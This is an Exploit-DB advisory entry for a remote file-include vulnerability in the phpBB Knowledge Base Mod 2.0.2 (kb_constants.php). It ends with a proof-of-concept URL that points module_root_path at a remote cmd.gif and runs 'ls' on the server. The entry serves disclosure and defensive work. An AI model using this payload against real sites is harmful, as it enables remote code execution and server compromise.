phpBB Knowledge Base 2.0.2 Mod KB_constants.PHP Remote File Include Vulnerability

2006-05-01T00:00:00
ID EDB-ID:27786
Type exploitdb
Reporter [Oo]
Modified 2006-05-01T00:00:00

Description

phpBB Knowledge Base 2.0.2 Mod KB_constants.PHP Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/17763/info

Knowledge Base Mod for phpbb is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

This issue is reported to affect version 2.0.2 and prior; other versions may also be vulnerable.

http://www.example.com/includes/kb_constants.php?module_root_path=http://www.example.com/cmd.gif?cmd=ls